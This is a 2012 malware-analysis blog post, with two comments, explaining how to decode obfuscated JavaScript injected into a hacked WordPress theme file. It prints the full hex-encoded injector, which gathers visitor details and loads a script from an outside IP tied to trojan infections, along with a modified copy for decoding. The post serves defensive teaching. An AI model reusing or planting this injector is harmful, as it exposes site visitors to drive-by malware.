Blog for hpHosts, and whatever else I feel like writing about ....

Friday 20 April 2012

Exploit me baby one more time

Okay, so I couldn't come up with a decent title, but the content is never the less, interesting. For those not already familiar with it anyway.

As usual, this only covers basic things, needed to determine where it's going.

In short, myself and my friend and fellow MDL admin, Holger, were sent a URL via the Malware Domain List contact form, letting us know the user had picked up a rather nasty trojan. You can already guess what the payload is, so I'm not going to cover that, instead, I'm only going to show you how to actually decode the code that's popped on your site.

The code is usually placed in the .js files, quite why is baffling as it makes it easy to find, but what the heck, it saves me work. In this case;

hxxp://www.saucepan.org.uk/wp-content/themes/pans/scripts/unitpngfix.js

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;


To decode this, all you need to, is pop it into Malzilla's decoder window, and modify it, so it becomes;

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
element=_0xdc8d[1];//(_0xdc8d[0]);


cls=_0xdc8d[2];
sw=_0xdc8d[3];
sh=_0xdc8d[4];
dc=_0xdc8d[5];
lc=_0xdc8d[6];
refurl=escape(_0xdc8d[7]);
ua=escape(_0xdc8d[8]);
var js=_0xdc8d[10];//(_0xdc8d[9]);
js=_0xdc8d[11]=_0xdc8d[0];
js=_0xdc8d[12]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;
var head=_0xdc8d[21];//(_0xdc8d[20])[0];
head=_0xdc8d[22]
document.write((js));


Click "Run Script", and viola - you can see where it redirects the victim to. From here, you can either follow it manually if you so wish (and remember - these things only allow access once per IP, so ensure you're both recording everything if following it, or have a few extra IPs to hand).

You could cleanup the code a bit to remove parts not required to decode it, but no point removing anymore than necessary.

Oh and Google, this new editor is absolutely rubbish!

/edit

I meant to mention, those seeing this code should be familiar not only with the code, but the IP this one redirects to - it was involved in the timthumb issue last year too;

http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/

2 comments:

Conrad Longmore said...

Or.. you could just past the URL into Wepawet and have it all done for you. Oh look, it's Spetsenergo and 91.196.216.64..

..this new Blogger interface definitely sucks though!

MysteryFCM said...

hehe yep, but that's too boring ;o) (figured I'd point out how to decode it manually, to save folk time, and try and get them used to identifying code they should be looking for at the same time).